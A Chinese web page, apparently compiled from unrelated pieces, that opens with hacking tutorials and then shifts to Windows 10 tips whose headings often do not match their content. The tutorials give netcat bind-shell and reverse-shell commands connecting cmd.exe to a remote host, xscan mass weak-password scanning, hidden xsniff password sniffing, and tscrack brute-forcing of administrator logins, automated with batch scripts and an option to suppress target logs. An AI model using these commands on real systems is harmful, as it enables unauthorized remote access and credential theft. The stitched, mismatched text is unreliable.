1.nc如何使用
一、基本使用想要连接到某处: nc [-options] hostname port[s] [ports] …绑定端口等待连接: nc -l -p port [-options] [hostname] [port]参数:-e prog 程序重定向,一旦连接,就执行 [危险!!]-g gateway source-routing hop point[s], up to 8G num source-routing pointer: 4, 8, 12, …-I secs 延时的间隔-l 监听模式,用于入站连接-n 指定数字的IP地址,不能用hostname-o file 记录16进制的传输-p port 本地端口号-r 任意指定本地及远程端口-s addr 本地源地址-t 以telnet的形式应答-u UDP模式-v 详细输出——用多个-v可得到更详细的内容-z 将输入输出关掉——用于扫描时-w secs timeout的时间二. 它的简单使用方法1.nc -l -p 80监听80端口2.nc -l -p 80 >c:\log.dat监听80端口,并把信息记录到log.dat3.nc -v -l -p 80监听80端口,并显示端口信息4.nc -l -p 80 -t -e cmd.exe监听本地的80端口的入站信息,同时将cmd.exe重定向至80端口,当有人连接的时候,就让cmd.exe以telnet的形式应答5.nc -v ip port扫描某ip的某个端口6.nc -v -z ip port-port扫描某ip的某端口到某端口7.nc -v -z -u ip port-port扫描某ip的某udp端口到某udp端口7.扫描远程主机nc -nvv -w2 -z 192.168.x.x 80-445扫描192.168.x.x的TCP 80到TCP445的所有端口8.REMOTE主机绑定SHELLnc -l -p 5354 -t -e c:\winnt\system32\cmd.exe绑定REMOTE主机的CMDSHELL在REMOTE主机的TCP5354端口9.REMOTE主机绑定SHELL并反向连接nc -t -e c:\winnt\system32\cmd.exe 192.168.x.x 5354绑定REMOTE主机的CMDSHELL并反向连接到192.168.x.x的TCP5354端口三.使用的例子1. 计算机192.168.0.1运行:nc -v -n -p 99计算机192.168.0.8运行:nc -e cmd.exe 192.168.0.1 99这样我们就获得了192.168.0.8的一个shell2.计算机192.168.0.1运行:nc -v -n 192.168.0.8 99计算机192.168.0.8运行:nc -v -l -p 99 >d:\sc.exe四.高级用法:1.作攻击程序用格式1:type c:\exploit.txt|nc -nvv 192.168.x.x 80格式2:nc -nvv 192.168.x.x 80 c:\log.txt使用'-L'可以不停地监听某一个端口,直到ctrl+c为止,同时把结果输出到'c:\log.txt'中,如果把'>' 改为'>>'即可以追加日志3.作蜜罐用nc -L -p 80 评论0 0 0。
2.nc.exe使用方法
参数说明: -h 查看帮助信息 -d 后台模式 -e prog程序重定向,一但连接就执行〔危险〕 -i secs延时的间隔 -l 监听模式,用于入站连接 -L 监听模式,连接天闭后仍然继续监听,直到CTR+C -n IP地址,不能用域名 -o film记录16进制的传输 -p[空格]端口 本地端口号 -r 随机本地及远程端口 -t 使用Telnet交互方式 -u UDP模式 -v 详细输出,用-vv将更详细 -w数字 timeout延时间隔 -z 将输入,输出关掉(用于扫锚时) 基本用法: nc -nvv 192.168.0.1 80 连接到192.168.0.1主机的80端口 nc -l -p 80 开启本机的TCP 80端口并监听 nc -nvv -w2 -z 192.168.0.1 80-1024 扫锚192.168.0.1的80-1024端口 nc -l -p 5354 -t -e c:winntsystem32cmd.exe 绑定remote主机的cmdshell在 remote的TCP 5354端口 nc -t -e c:winntsystem32cmd.exe 192.168.0.2 5354 梆定remote主机的 cmdshell并反向连接192.168.0.2的5354端口 高级用法: nc -L -p 80 作为蜜罐用1:开启并不停地监听80端口,直到CTR+C为止 nc -L -p 80 > c:\log.txt 作为蜜罐用2:开启并不停地监听80端口,直到 CTR+C,同时把结果输出到c:\log.txt nc -L -p 80 存放文件的路径及名称 传送文件 到对方主机 备 注: | 管道命令 重定向命令。
“> d:\log.txt 意思是:后台执行dir,并把结果存在d:\log.txt中 >与>>的区别 ">"指:覆盖;">>"指:保存到(添加到)。 如:@dir c:\winnt >> d:\log.txt和@dir c:\winnt > d:\log.txt二个命令分别 执行二次比较看:用>>的则是把二次的结果都保存了,而用:>则只有一次的结果 ,是因为第二次的结果把第一次的覆盖了。
2、扫锚工具:xscan.exe 基本格式 xscan -host [-] [其他选项] 扫锚"起始IP到终止 IP"段的所有主机信息 xscan -file [其他选项] 扫锚"主机IP列表文件 名"中的所有主机信息 检测项目 -active 检测主机是否存活 -os 检测远程操作系统类型(通过NETBIOS和SNMP协议) -port 检测常用服务的端口状态 -ftp 检测FTP弱口令 -pub 检测FTP服务匿名用户写权限 -pop3 检测POP3-Server弱口令 -smtp 检测SMTP-Server漏洞 -sql 检测SQL-Server弱口令 -smb 检测NT-Server弱口令 -iis 检测IIS编码/解码漏洞 -cgi 检测CGI漏洞 -nasl 加载Nessus攻击脚本 -all 检测以上所有项目 其它选项 -i 适配器编号 设置网络适配器, 可通过"-l"参数获取 -l 显示所有网络适配器 -v 显示详细扫描进度 -p 跳过没有响应的主机 -o 跳过没有检测到开放端口的主机 -t 并发线程数量,并发主机数量 指定最大并发线程数量和并发主机数量, 默 认数量为100,10 -log 文件名 指定扫描报告文件名 (后缀为:TXT或HTML格式的文件) 用法示例 xscan -host 192.168.1.1-192.168.255.255 -all -active -p 检测 192.168.1.1-192.168.255.255网段内主机的所有漏洞,跳过无响应的主机 xscan -host 192.168.1.1-192.168.255.255 -port -smb -t 150 -o 检测 192.168.1.1-192.168.255.255网段内主机的标准端口状态,NT弱口令用户,最大 并发线程数量为150,跳过没有检测到开放端口的主机 xscan -file hostlist.txt -port -cgi -t 200,5 -v -o 检测“hostlist.txt” 文件中列出的所有主机的标准端口状态,CGI漏洞,最大并发线程数量为200,同 一时刻最多检测5台主机,显示详细检测进度,跳过没有检测到开放端口的主机 3、命令行方式嗅探器: xsniff.exe 可捕获局域网内FTP/SMTP/POP3/HTTP协议密码 参数说明 -tcp 输出TCP数据报 -udp 输出UDP数据报 -icmp 输出ICMP数据报 -pass 过滤密码信息 -hide 后台运行 -host 解析主机名 -addr IP地址 过滤IP地址 -port 端口 过滤端口 -log 文件名 将输出保存到文件 -asc 以ASCII形式输出 -hex 以16进制形式输出 用法示例 xsniff.exe -pass -hide -log pass.log 后台运行嗅探密码并将密码信息保存在 pass.log文件中 xsniff.exe -tcp -udp -asc -addr 192.168.1.1 嗅探192.168.1.1并过滤tcp和 udp信息并以ASCII格式输出 4、终端服务密码破解: tscrack.exe 参数说明 -h 显示使用帮助 -v 显示版本信息 -s 在屏幕上打出解密能力 -b 密码错误时发出的声音 -t 同是发出多个连接(多线程) -N Prevent System Log entries on targeted server -U 卸载移除tscrack组件 -f 使用-f后面的密码 -F 间隔时间(频率) -l 使用-l后面的用户名 -w 使用-w后面的密码字典 -p 使用-p后面的密码 -D 登录主页面 用法示例 tscrack 192.168.0.1 -l administrator -w pass.dic 远程用密码字典文件暴破 主机的administrator的登陆密码 tscrack 192.168.0.1 -l administrator -p 123456 用密码123456远程登陆 192.168.0.1的administrator用户 @if not exist ipcscan.txt goto noscan @for /f "tokens=1 delims= " %%i in (3389.txt) do call hack.bat %%i nscan @echo 3389.txt no find or scan faild (①存为3389.bat) (假设现有用SuperScan或其它扫锚器扫到一批开有3389的主 机IP列表文件3389.txt) 3389.bat意思是:从3389.txt文件中取一个IP,接着运行hack.bat @if not exist tscrack.exe goto noscan @tscrack %1 -l administrator -w pass.dic >>rouji.txt :noscan @echo tscrack.exe no find or scan faild (②存为hack.bat) (运行3389.bat就OK,且3389.bat、hack.bat、3389.txt、pass.dic与tscrack.exe在同一个目录下;就可以等待结。
3.win10 directdraw怎么开启
Win7旗舰版系统怎么查看DirectX版本?相信很多朋友在下载安装游戏的时候官方网站都会标注运行所需要的DirectX的版本,可能大家还不知道Directx是什么?它是由微软公司开发的用途广泛的API,它包含有Direct Graphics(Direct 3D+Direct Draw)、Direct Input、Direct Play、Direct Sound、Direct Show、Direct Setup、Direct Media Objects等多个组件,它提供了一整套的多媒体接口方案。它可让以windows为平台的游戏或多媒体程序获得更高的执行效率,加强3d图形和声音效果,并提供设计人员一个共同的硬件驱动标准。
这么说来,如果我们要玩一款游戏那么就必须让win7系统满足游戏对DirectX版本的需求,一般系统里都自带了DircetX;
我们如果查看DirectX版本呢?
1、点击开始菜单,然后运行,在运行框中输入 Dxdiag 并回车;
2、打开directx诊断界面后,我们就可以在页面下方看到win7系统内的Direct是什么版本了如下图;
win7系统还需要安装Directx 9.0C吗?
在上面,我们查看到了win7系统的directx版本为 11,据微软说明DirectX版本是能向下兼容的,不过在实际使用中,我们发现很多游戏,如果没有安装过DirectX 9.0C的话是不能正常运行的,对于装不装,看你用不用的到了,一般来主网上下载的系统版本都有集成Directx 9.0C 如果你玩游戏不正常,还是安装一下吧。
下载地址:/rjxz/xtgj/patch-xiazai-94.html
4.startisback win10怎么使用
安装前必须退出360“安全软件”,否则会出错!安装很简单,就一步:
你可以选择为当前用户安装,如果是多用户系统你可以选择为所有用户安装:
安装成功后,点击左下角的开始按钮就会弹出经典的Win7开始菜单了
在开始菜单空白区域,右键-属性(如下图)
在配置页面的左侧,选择外观,在右侧选择你正使用的主题开始菜单皮肤,确定
如果你应用有主题但在外观里面找不到开始菜单皮肤请看下面教程:
如果你是第一次使用,开始菜单或许会太高或太矮十分不美观
打开配置,在开始菜单项目设置里面你可以选择左侧程序显示数目和右侧哪些项目显示(如下图)
适当的减少或增加上图的项目,即可达到完美效果
5.win10Cortana怎么用
Cortana设置方法:
点击Windows桌面左下角的“Cortana”搜索框,从弹出的扩展面板中切换到“笔记本”选项卡。
耐心等待一会儿,就会在“笔记 本”右侧的列表中找到“设置”按钮,如图所示,在此我们直接点击“设置”按钮进入。
从打开的“Cortana设置”界面中,点击如图所示的“开关”即可实现“开启”或“关闭”Win10正式版系统中的Cortana搜索功能。
同时点击如图所示的两个图标之一,就可以修改“Cortana”图标的出现方式:
点击桌面左下角的“Windows”图标,从其扩展面板中点击“设置”按钮。
从打开的“设置”界面中,点击“隐私”按钮进入。在此界面中,切换到“语音、墨迹书写和键入”选项卡,点击“转到秘应,管理所有设备的个人信息”按钮。
从打开的“必应”个人信息设置界面后,先完成登陆操作,再切换到“网页”选项卡界面,从“搜索语音”界面中选择“简体中文”项,点击“保存退出” 即可。
Cortana使用方法:
Cortana语音识别搜索功能的开启方法,点击“Cortana搜索框右侧的“语音识别”按钮。
此时“Cortana”将自动处于“聆听”状态,将有语音通过麦克风输入时,将自动进行识别同时打开默认浏览器,并利用Bing搜索对应关键词的相关内容。
在“Cortana”搜索框中,输入想要搜索的内容,即可在搜索界面中显示“此电脑应用”、“网页搜索”以及“我的资料”相关信息,可以说Cortana的搜索功能很强大。
Cortana提醒功能的使用方法:
从打开的Cortana扩展面板主界面中,切换到“提醒”功能选项卡,点击右下角的“+”以添加新的事件提醒功能。
6.win10怎么设置开机启动onk
使用
Windows 启动设置屏幕(以前称为高级启动选项),你可以以不同的高级疑难解答模式启动
Windows 以便你可以查找和解决你电脑上的问题。 在以前版本的 Windows 中,你可以通过按 F8 在 Windows 启动之前到达该屏幕。 Windows 10 电脑快速启动,因此没有足够的时间来按
F8。
有两种到达 Windows 10中的 Windows 启动设置屏幕的方法:
如果你未登录到
Windows,则点击或单击登录屏幕中的电源图标 ,按“Shift”,然后点击或单击“重新启动”
或者,如果你已登录:
从屏幕右边缘向中间轻扫,点击“设置”,然后点击“更改电脑设置”。
(如果使用鼠标,则指向屏幕右上角,然后将指针向下移动,单击“设置”,然后单击“更改电脑设置”。)
在“电脑设置”下,点击或单击“常规”。
在“高级启动”下,点击或单击“立即重新启动”。
在“选择一个选项”屏幕上,点击或单击“疑难解答”。
点击或单击“启动设置”。
点击或单击“重新启动”。
在“启动设置”屏幕上,选择所需的启动设置。
使用具有管理员权限的用户帐户登录你的电脑。
某些选项(如安全模式)将以限定状态启动
Windows,其中只会启动必需的程序。 其他选项将启动带有高级功能(通常由系统管理员和
IT 专业人员使用)的 Windows。 有关详细信息,请转至适用于 IT 专业人士的
Microsoft 网站。
全部显示
调试模式
启用引导日志
启用低分辨率视频
(640x480)
安全模式
网络安全模式
带命令提示符的安全模式
禁用强制驱动程序签名
禁用提前启动反恶意软件保护
禁用失败后自动重新启动
目录服务还原模式
注意
如果在平板电脑或
Windows RT 设备上使用
BitLocker,你将需要先挂起
BitLocker,然后才能到达
Windows 启动设置。
转载请注明出处windows之家 » win10中如何使用nc